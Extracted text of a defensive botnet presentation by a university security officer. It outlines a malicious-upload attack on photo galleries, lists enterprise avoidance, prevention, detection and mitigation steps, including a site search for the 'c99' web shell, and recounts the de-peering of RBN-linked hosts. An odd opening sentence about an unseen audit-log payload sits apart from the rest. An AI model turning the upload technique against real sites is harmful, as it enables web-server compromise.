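The cat= payload from the audit log is not hex-obfuscated at all, yet a regex that expects whitespace between the keywords still misses it until the '+' separators are decoded, which is why inspection has to run on the normalised form the way ModSecurity's ARGS: transformation does.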
Pictures
phpBB photo galleries that permit users to post their own pictures
Diagram actors: Attacker, Webhost.com
1. Evil user posts an executable file with a .gif extension (notapic.gif)
2. Evil user browses to the executable gif
3. Webhost executes notapic.gif as the web page owner
Other means
• Profiles of user accounts (social networking sites)
• Comment sections that don't require the user to authenticate
• BBs that permit users to create their own accounts without an administrator
• User web pages
• Departmental web pages
• Traditional network vulnerability attacks
Protect Your Enterprise
AVOIDANCE
1. Establish a perimeter and segregate valuable or dangerous network segments. Make FW rules accountable and require change control.
PREVENT
1. Ensure that all enterprise and local accounts have strong passwords. Configure Domain security policy to enforce this and auto-lockout.
2. Eliminate all generic accounts. Where possible make all non-user accounts services.
3. Eliminate or encapsulate all unencrypted authentication.
4. Establish standards for web app and other development to eliminate avoidable coding vulnerabilities (e.g. use of mod-sec for Apache websites).
5. Staff your anti-spam, anti-virus, abuse, proxy cache, and web filter processing efforts.
6. Block outbound port 25 traffic except from your official mail servers.
7. Block outbound DNS requests except for iterative requests made through the official DNS servers (prevents spray-and-pray attacks).
Protect Your Enterprise
DETECT
1. Install and operate IDS/IPS systems (snort, etc.).
2. Analyze network traffic for heuristic evidence of botlike behavior.
3. Google your own site: site:mysite.com viagra, site:mysite.com c99
4. Centralize and process logs, including workstation security and firewall logs.
5. Mine your anti-virus quarantines, abuse notifications and infected systems for intelligence about botnet infections. Feed this information to your event correlation system.
6. Participate in or join quasi-intelligence organizations.
MITIGATE
1. Use intelligence data in your DNS server to block access to C&C sites and malware distribution sites.
2. Use your centralized logs to detect and react to password guessing schemes in near-realtime.
3. Report detections to an incident response team that will quarantine compromised systems, determine physical location, and direct IT staff to retrieve the system, extract first responder data and intelligence, re-image the system, then return it to the system owner along with a report on the successful attack vector.
4. Include known malware distribution sites in your proxy server block lists.
5. Establish a spearphishing hotline for quick response.
Protect Your Enterprise
REDUCE THE THREAT
1. Report new threats: phishing attacks to the Anti-Phishing Working Group, botnet clients/C&C to isotf.org.
2. Feed the bot-related DNS attempts to your event correlation system.
3. Add SiteAdvisor or the IE7 anti-phishing feature to browsers.
REDUCE THE VULNERABILITY
1. Actively scan your site for vulnerabilities (OS, network, web apps, etc.).
NON-REALTIME ANALYSIS, DETECTION, and RECOVERY
1. Analyze data collected to identify new intelligence markers.
2. Evaluate new signatures, new tools, etc.
3. Use non-realtime data to develop strategies for ranking confidence related to available data and intelligence.
4. Use forensic techniques and sandbox technology to gather intelligence from known compromised workstations.
RBN
RBN Operations
11/21/07 Ref: Bizeul.org
Diagram nodes: SPB IX, DELTASYS, DATAPOINT, INFOBOX, RBN, SILVERNET, CREDOLINK, OINVEST
RBN USA Dead?
It is pleasing to report the last remaining peer routing Atrivo (AS 27595 Atrivo/ Intercage), 'Pacific Internet Exchange' (PIE) see Spamhaus ref below, was withdrawn at 2:35am EST Sunday Sept 21st 2008.
What Happened?
http://www.betanews.com/article/UnitedLayer_COO_Giving_access_to_InterCage_is_an_issue_of_ethics/1222396858
"Company after company dropped relations with InterCage in the wake of multiple reports documenting its shady dealings. Suddenly UnitedLayer was the last firm willing to work with it. That essentially gave Donaldson's people the power to send InterCage dark or, as he chose to do, stick InterCage in a sandbox."
By Angela Gunn, BetaNews, September 25, 2008, 10:40 PM
McColo
Effect of De-peering
50% Drop in Spam
Who's Next?
In the wake of the demise of Atrivo/Intercage and McColo, attention has focused on other badware nets these entities formerly hosted: EstDomains, Esthost, Hostfresh, Cernel.
EstDomains was an Estonian network, led by Vladimir Tsastsin, that allegedly once acted as the IP registrar for RBN domains. Malicious Web site hosting nasties like CoolWebSearch and other spyware programs trace back to EstDomains. Tsastsin has links to organized crime and also heads up Rove Digital, a site also suspected of hosting malware servers.
Anti-spam group Spamhaus called EstDomains, Esthost, Cernel, and Hostfresh the "tentacles" of Atrivo/Intercage. Spamhaus cited these networks in August 2008 as backed by "gangs of cybercriminals" whose disappearance from the Web would be difficult to achieve, but would result in a safer Internet.
Agenda
• Botnet Overview
• Botnet Schemes
• How Do They Get In?
• What Can We Do?
• Concluding Thoughts
Source of all evil
Q&A
Questions?
Craig A Schiller, CISSP-ISSMP, [email protected]
Portland State University CISO